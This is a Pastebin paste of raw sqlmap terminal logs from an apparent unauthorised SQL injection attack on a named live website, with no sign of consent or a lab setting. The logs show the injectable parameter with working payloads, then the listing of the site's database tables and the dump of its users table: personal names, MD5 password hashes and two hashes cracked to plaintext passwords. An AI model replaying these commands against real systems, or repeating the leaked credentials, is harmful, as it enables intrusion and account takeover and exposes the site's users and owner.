Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent --dbs
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet --tables
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 22:14:54
- [22:14:54] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.52 (X11; Linux x86_64; U; en)
- [22:14:55] [INFO] resuming back-end DBMS 'mysql'
- [22:15:03] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: menu
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
- ---
- [22:15:10] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.2.6, Apache
- back-end DBMS: MySQL 5.0
- [22:15:10] [INFO] fetching tables for database: 'gymsticknet'
- [22:15:23] [INFO] heuristics detected web page charset 'ascii'
- [22:15:23] [INFO] the SQL query used returns 134 entries
- [22:15:24] [INFO] retrieved: afb_accounts
- [22:15:24] [INFO] retrieved: afb_accounts_has_perms
- [22:15:25] [INFO] retrieved: afb_blacklist_dirs
- [22:15:25] [INFO] retrieved: afb_blacklist_ext
- [22:15:26] [INFO] retrieved: afb_blacklist_files
- [22:15:26] [INFO] retrieved: afb_log
- [22:15:27] [INFO] retrieved: afb_settings
- [22:15:28] [INFO] retrieved: afb_shares
- [22:15:28] [INFO] retrieved: bh2_aclgroups
- [22:15:30] [INFO] retrieved: bh2_aclpublic
- [22:15:31] [INFO] retrieved: bh2_aclusers
- [22:15:31] [INFO] retrieved: bh2_adminmodulesmenu
- [22:15:32] [INFO] retrieved: bh2_bandwidth
- [22:15:32] [INFO] retrieved: bh2_config
- [22:15:34] [INFO] retrieved: bh2_filecodereminders
- [22:15:34] [INFO] retrieved: bh2_filecodes
- [22:15:35] [INFO] retrieved: bh2_groupusers
- [22:15:36] [INFO] retrieved: bh2_log
- [22:15:36] [INFO] retrieved: bh2_logactions
- [22:15:37] [INFO] retrieved: bh2_metadata
- [22:15:39] [INFO] retrieved: bh2_modules
- [22:15:39] [INFO] retrieved: bh2_modulesaccesslevel
- [22:15:40] [INFO] retrieved: bh2_modulesdirectory
- [22:15:40] [INFO] retrieved: bh2_modulesfiletype
- [22:15:41] [INFO] retrieved: bh2_modulesmenu
- [22:15:42] [INFO] retrieved: bh2_modulesusertype
- [22:15:43] [INFO] retrieved: bh2_packages
- [22:15:43] [INFO] retrieved: bh2_passwordresets
- [22:15:45] [INFO] retrieved: bh2_registrations
- [22:15:46] [INFO] retrieved: bh2_satellitetransfers
- [22:15:46] [INFO] retrieved: bh2_texts
- [22:15:47] [INFO] retrieved: bh2_uploads
- [22:15:48] [INFO] retrieved: bh2_userinfo
- [22:15:50] [INFO] retrieved: bh2_users
- [22:15:51] [INFO] retrieved: bh2_usersviews
- [22:15:53] [INFO] retrieved: contacts
- [22:15:55] [INFO] retrieved: countries
- [22:15:57] [INFO] retrieved: downloads_agreements
- [22:15:59] [INFO] retrieved: downloads_categories
- [22:16:00] [INFO] retrieved: downloads_comments
- [22:16:02] [INFO] retrieved: downloads_config
- [22:16:04] [INFO] retrieved: downloads_customfields
- [22:16:06] [INFO] retrieved: downloads_customfields_data
- [22:16:07] [INFO] retrieved: downloads_files
- [22:16:09] [INFO] retrieved: downloads_ip_restrict
- [22:16:10] [INFO] retrieved: downloads_ip_restrict_log
- [22:16:10] [INFO] retrieved: downloads_languages
- [22:16:11] [INFO] retrieved: downloads_leech_settings
- [22:16:12] [INFO] retrieved: downloads_mirrors
- [22:16:12] [INFO] retrieved: downloads_permissions
- [22:16:13] [INFO] retrieved: downloads_recommend_blocklist
- [22:16:13] [INFO] retrieved: downloads_recommend_log
- [22:16:14] [INFO] retrieved: downloads_stats
- [22:16:14] [INFO] retrieved: downloads_usergroups
- [22:16:15] [INFO] retrieved: downloads_userpermissions
- [22:16:16] [INFO] retrieved: downloads_users
- [22:16:16] [INFO] retrieved: files
- [22:16:17] [INFO] retrieved: folders
- [22:16:17] [INFO] retrieved: intrausers
- [22:16:18] [INFO] retrieved: ipfm_groups
- [22:16:19] [INFO] retrieved: ipfm_reg_antispam
- [22:16:19] [INFO] retrieved: ipfm_validating
- [22:16:20] [INFO] retrieved: menu
- [22:16:21] [INFO] retrieved: pages
- [22:16:21] [INFO] retrieved: pfn_accesos
- [22:16:22] [INFO] retrieved: pfn_arquivos
- [22:16:22] [INFO] retrieved: pfn_arquivos_campos_palabras
- [22:16:23] [INFO] retrieved: pfn_bloqueo_ip
- [22:16:23] [INFO] retrieved: pfn_campos
- [22:16:24] [INFO] retrieved: pfn_configuracions
- [22:16:25] [INFO] retrieved: pfn_configuracions_datos
- [22:16:25] [INFO] retrieved: pfn_directorios
- [22:16:26] [INFO] retrieved: pfn_grupos
- [22:16:26] [INFO] retrieved: pfn_palabras
- [22:16:27] [INFO] retrieved: pfn_raices
- [22:16:27] [INFO] retrieved: pfn_raices_grupos_configuracions
- [22:16:28] [INFO] retrieved: pfn_raices_usuarios
- [22:16:29] [INFO] retrieved: pfn_sesions
- [22:16:29] [INFO] retrieved: pfn_usuarios
- [22:16:30] [INFO] retrieved: phpwebgallery_caddie
- [22:16:31] [INFO] retrieved: phpwebgallery_categories
- [22:16:31] [INFO] retrieved: phpwebgallery_comments
- [22:16:32] [INFO] retrieved: phpwebgallery_config
- [22:16:32] [INFO] retrieved: phpwebgallery_download_multi
- [22:16:33] [INFO] retrieved: phpwebgallery_favorites
- [22:16:34] [INFO] retrieved: phpwebgallery_group_access
- [22:16:36] [INFO] retrieved: phpwebgallery_groups
- [22:16:36] [INFO] retrieved: phpwebgallery_history
- [22:16:37] [INFO] retrieved: phpwebgallery_history_summary
- [22:16:38] [INFO] retrieved: phpwebgallery_image_category
- [22:16:38] [INFO] retrieved: phpwebgallery_image_tag
- [22:16:39] [INFO] retrieved: phpwebgallery_images
- [22:16:39] [INFO] retrieved: phpwebgallery_old_permalinks
- [22:16:40] [INFO] retrieved: phpwebgallery_plugins
- [22:16:41] [INFO] retrieved: phpwebgallery_rate
- [22:16:41] [INFO] retrieved: phpwebgallery_search
- [22:16:42] [INFO] retrieved: phpwebgallery_sessions
- [22:16:42] [INFO] retrieved: phpwebgallery_sites
- [22:16:43] [INFO] retrieved: phpwebgallery_tags
- [22:16:43] [INFO] retrieved: phpwebgallery_upgrade
- [22:16:44] [INFO] retrieved: phpwebgallery_user_access
- [22:16:45] [INFO] retrieved: phpwebgallery_user_cache
- [22:16:45] [INFO] retrieved: phpwebgallery_user_cache_categories
- [22:16:46] [INFO] retrieved: phpwebgallery_user_feed
- [22:16:47] [INFO] retrieved: phpwebgallery_user_group
- [22:16:47] [INFO] retrieved: phpwebgallery_user_infos
- [22:16:48] [INFO] retrieved: phpwebgallery_user_mail_notification
- [22:16:48] [INFO] retrieved: phpwebgallery_users
- [22:16:49] [INFO] retrieved: phpwebgallery_waiting
- [22:16:53] [INFO] retrieved: phpwebgallery_ws_access
- [22:16:54] [INFO] retrieved: relay_clients
- [22:16:54] [INFO] retrieved: relay_filesystem
- [22:16:55] [INFO] retrieved: relay_log
- [22:16:56] [INFO] retrieved: relay_permissions
- [22:16:57] [INFO] retrieved: relay_users
- [22:16:58] [INFO] retrieved: spages
- [22:16:58] [INFO] retrieved: submenu
- [22:16:59] [INFO] retrieved: tc_acp_label_states
- [22:17:00] [INFO] retrieved: tc_admin_cp_false_logins
- [22:17:01] [INFO] retrieved: tc_banned_ips
- [22:17:01] [INFO] retrieved: tc_error_log
- [22:17:02] [INFO] retrieved: tc_forum_integration
- [22:17:03] [INFO] retrieved: tc_installed_plugins
- [22:17:03] [INFO] retrieved: tc_membergroups
- [22:17:04] [INFO] retrieved: tc_members
- [22:17:05] [INFO] retrieved: tc_menu
- [22:17:05] [INFO] retrieved: tc_pages
- [22:17:06] [INFO] retrieved: tc_plugin_lists
- [22:17:06] [INFO] retrieved: tc_plugins
- [22:17:07] [INFO] retrieved: tc_sessions
- [22:17:07] [INFO] retrieved: tc_settings
- [22:17:08] [INFO] retrieved: tc_statistics_visitors
- [22:17:09] [INFO] retrieved: test
- [22:17:09] [INFO] retrieved: users
- Database: gymsticknet
- [134 tables]
- +--------------------------------------+
- | afb_accounts |
- | afb_accounts_has_perms |
- | afb_blacklist_dirs |
- | afb_blacklist_ext |
- | afb_blacklist_files |
- | afb_log |
- | afb_settings |
- | afb_shares |
- | bh2_aclgroups |
- | bh2_aclpublic |
- | bh2_aclusers |
- | bh2_adminmodulesmenu |
- | bh2_bandwidth |
- | bh2_config |
- | bh2_filecodereminders |
- | bh2_filecodes |
- | bh2_groupusers |
- | bh2_log |
- | bh2_logactions |
- | bh2_metadata |
- | bh2_modules |
- | bh2_modulesaccesslevel |
- | bh2_modulesdirectory |
- | bh2_modulesfiletype |
- | bh2_modulesmenu |
- | bh2_modulesusertype |
- | bh2_packages |
- | bh2_passwordresets |
- | bh2_registrations |
- | bh2_satellitetransfers |
- | bh2_texts |
- | bh2_uploads |
- | bh2_userinfo |
- | bh2_users |
- | bh2_usersviews |
- | contacts |
- | countries |
- | downloads_agreements |
- | downloads_categories |
- | downloads_comments |
- | downloads_config |
- | downloads_customfields |
- | downloads_customfields_data |
- | downloads_files |
- | downloads_ip_restrict |
- | downloads_ip_restrict_log |
- | downloads_languages |
- | downloads_leech_settings |
- | downloads_mirrors |
- | downloads_permissions |
- | downloads_recommend_blocklist |
- | downloads_recommend_log |
- | downloads_stats |
- | downloads_usergroups |
- | downloads_userpermissions |
- | downloads_users |
- | files |
- | folders |
- | intrausers |
- | ipfm_groups |
- | ipfm_reg_antispam |
- | ipfm_validating |
- | menu |
- | pages |
- | pfn_accesos |
- | pfn_arquivos |
- | pfn_arquivos_campos_palabras |
- | pfn_bloqueo_ip |
- | pfn_campos |
- | pfn_configuracions |
- | pfn_configuracions_datos |
- | pfn_directorios |
- | pfn_grupos |
- | pfn_palabras |
- | pfn_raices |
- | pfn_raices_grupos_configuracions |
- | pfn_raices_usuarios |
- | pfn_sesions |
- | pfn_usuarios |
- | phpwebgallery_caddie |
- | phpwebgallery_categories |
- | phpwebgallery_comments |
- | phpwebgallery_config |
- | phpwebgallery_download_multi |
- | phpwebgallery_favorites |
- | phpwebgallery_group_access |
- | phpwebgallery_groups |
- | phpwebgallery_history |
- | phpwebgallery_history_summary |
- | phpwebgallery_image_category |
- | phpwebgallery_image_tag |
- | phpwebgallery_images |
- | phpwebgallery_old_permalinks |
- | phpwebgallery_plugins |
- | phpwebgallery_rate |
- | phpwebgallery_search |
- | phpwebgallery_sessions |
- | phpwebgallery_sites |
- | phpwebgallery_tags |
- | phpwebgallery_upgrade |
- | phpwebgallery_user_access |
- | phpwebgallery_user_cache |
- | phpwebgallery_user_cache_categories |
- | phpwebgallery_user_feed |
- | phpwebgallery_user_group |
- | phpwebgallery_user_infos |
- | phpwebgallery_user_mail_notification |
- | phpwebgallery_users |
- | phpwebgallery_waiting |
- | phpwebgallery_ws_access |
- | relay_clients |
- | relay_filesystem |
- | relay_log |
- | relay_permissions |
- | relay_users |
- | spages |
- | submenu |
- | tc_acp_label_states |
- | tc_admin_cp_false_logins |
- | tc_banned_ips |
- | tc_error_log |
- | tc_forum_integration |
- | tc_installed_plugins |
- | tc_membergroups |
- | tc_members |
- | tc_menu |
- | tc_pages |
- | tc_plugin_lists |
- | tc_plugins |
- | tc_sessions |
- | tc_settings |
- | tc_statistics_visitors |
- | test |
- | users |
- +--------------------------------------+
- [22:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
- [*] shutting down at 22:17:10
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users --columns
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 22:21:35
- [22:21:35] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52
- [22:21:36] [INFO] resuming back-end DBMS 'mysql'
- [22:21:37] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: menu
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
- ---
- [22:21:38] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.2.6, Apache
- back-end DBMS: MySQL 5.0
- [22:21:38] [INFO] fetching columns for table 'users' in database 'gymsticknet'
- [22:21:39] [INFO] heuristics detected web page charset 'ascii'
- [22:21:39] [INFO] the SQL query used returns 5 entries
- [22:21:40] [INFO] retrieved: id
- [22:21:40] [INFO] retrieved: int(11)
- [22:21:41] [INFO] retrieved: name
- [22:21:42] [INFO] retrieved: varchar(255)
- [22:21:42] [INFO] retrieved: username
- [22:21:43] [INFO] retrieved: varchar(255)
- [22:21:43] [INFO] retrieved: password
- [22:21:44] [INFO] retrieved: varchar(255)
- [22:21:44] [INFO] retrieved: super
- [22:21:45] [INFO] retrieved: tinyint(1)
- Database: gymsticknet
- Table: users
- [5 columns]
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | id | int(11) |
- | name | varchar(255) |
- | password | varchar(255) |
- | super | tinyint(1) |
- | username | varchar(255) |
- +----------+--------------+
- [22:21:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
- [*] shutting down at 22:21:45
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C name --dump
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 22:24:37
- [22:24:37] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
- [22:24:38] [INFO] resuming back-end DBMS 'mysql'
- [22:24:40] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: menu
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
- ---
- [22:24:43] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.2.6, Apache
- back-end DBMS: MySQL 5.0
- do you want sqlmap to consider provided column(s):
- [1] as LIKE column names (default)
- [2] as exact column names
- > 2
- [22:24:47] [INFO] fetching columns 'name' for table 'users' in database 'gymsticknet'
- [22:24:47] [INFO] heuristics detected web page charset 'ascii'
- [22:24:48] [INFO] the SQL query used returns 1 entries
- [22:24:48] [INFO] retrieved: name
- [22:24:49] [INFO] retrieved: varchar(255)
- [22:24:49] [INFO] fetching entries of column(s) 'name' for table 'users' in database 'gymsticknet'
- [22:24:49] [INFO] the SQL query used returns 4 entries
- [22:24:50] [INFO] retrieved: antti mikkola
- [22:24:51] [INFO] retrieved: juha hoo
- [22:24:51] [INFO] retrieved: keijo pesonen
- [22:24:52] [INFO] retrieved: testikayttaja
- [22:24:52] [INFO] analyzing table dump for possible password hashes
- Database: gymsticknet
- Table: users
- [4 entries]
- +---------------+
- | name |
- +---------------+
- | antti mikkola |
- | juha hoo |
- | keijo pesonen |
- | testikayttaja |
- +---------------+
- [22:24:52] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
- [22:24:52] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
- [*] shutting down at 22:24:52
- root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C password --dump
- sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 22:25:42
- [22:25:42] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
- [22:25:42] [INFO] resuming back-end DBMS 'mysql'
- [22:25:43] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: menu
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
- ---
- [22:25:45] [INFO] the back-end DBMS is MySQL
- web application technology: PHP 5.2.6, Apache
- back-end DBMS: MySQL 5.0
- do you want sqlmap to consider provided column(s):
- [1] as LIKE column names (default)
- [2] as exact column names
- > 2
- [22:25:49] [INFO] fetching columns 'password' for table 'users' in database 'gymsticknet'
- [22:25:50] [INFO] heuristics detected web page charset 'ascii'
- [22:25:50] [INFO] the SQL query used returns 1 entries
- [22:25:51] [INFO] retrieved: password
- [22:25:51] [INFO] retrieved: varchar(255)
- [22:25:52] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'gymsticknet'
- [22:25:52] [INFO] the SQL query used returns 4 entries
- [22:25:52] [INFO] retrieved: 8d68c0d987f302d0fe6de347245b5587
- [22:25:53] [INFO] retrieved: 9627df7a4a5b849f67fce863e82adc71
- [22:25:53] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
- [22:25:54] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
- [22:25:54] [INFO] analyzing table dump for possible password hashes
- recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
- [22:26:03] [INFO] using hash method 'md5_generic_passwd'
- what dictionary do you want to use?
- [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
- [2] custom dictionary file
- [3] file with list of dictionary files
- > 1
- [22:26:23] [INFO] using default dictionary
- [22:26:23] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
- do you want to use common password suffixes? (slow!) [y/N] y
- [22:26:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
- [22:26:32] [INFO] starting 2 processes
- [22:27:08] [INFO] cracked password 'testi' for hash '9627df7a4a5b849f67fce863e82adc71'
- [22:27:11] [INFO] using suffix '1'
- [22:27:40] [INFO] cracked password 'molo1' for hash 'db2fa9922825f59757dd5fcb5d8e1f2b'
- [22:27:54] [INFO] using suffix '123'
- [22:28:35] [INFO] using suffix '2'
- [22:29:17] [INFO] using suffix '12'
- [22:29:55] [INFO] using suffix '3'
- [22:30:34] [INFO] using suffix '13'
- [22:31:12] [INFO] using suffix '7'
- [22:31:57] [INFO] using suffix '11'
- [22:32:34] [INFO] using suffix '5'
- [22:33:23] [INFO] using suffix '22'
- [22:34:00] [INFO] using suffix '23'
- [22:34:41] [INFO] using suffix '01'
- [22:35:36] [INFO] using suffix '4'
- [22:36:28] [INFO] using suffix '07'
- [22:37:06] [INFO] using suffix '21'
- [22:37:44] [INFO] using suffix '14'
- [22:38:27] [INFO] using suffix '10'
- [22:39:07] [INFO] using suffix '06'
- [22:39:42] [INFO] using suffix '08'
- [22:40:20] [INFO] using suffix '8'
- [22:40:58] [INFO] using suffix '15'
- [22:41:38] [INFO] using suffix '69'
- [22:42:17] [INFO] using suffix '16'
- [22:42:52] [INFO] using suffix '6'
- [22:43:27] [INFO] using suffix '18'
- [22:44:06] [INFO] using suffix '!'
- [22:44:44] [INFO] using suffix '.'
- [22:45:21] [INFO] using suffix '*'
- [22:45:58] [INFO] using suffix '!!'
- [22:46:32] [INFO] using suffix '?'
- [22:47:13] [INFO] using suffix ';'
- [22:47:49] [INFO] using suffix '..'
- [22:48:32] [INFO] using suffix '!!!'
- [22:49:17] [INFO] using suffix ','
- [22:49:54] [INFO] using suffix '@'
- [22:50:33] [INFO] writing uncracked hashes to file '/tmp/tmpzshPZE.txt' for eventual further processing
- [22:50:33] [INFO] postprocessing table dump
- Database: gymsticknet
- Table: users
- [4 entries]
- +------------------------------------------+
- | password |
- +------------------------------------------+
- | 8d68c0d987f302d0fe6de347245b5587 |
- | 9627df7a4a5b849f67fce863e82adc71 (testi) |
- | db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
- | db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
- +------------------------------------------+
- [22:50:33] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
- [22:50:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
- [*] shutting down at 22:50:33
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement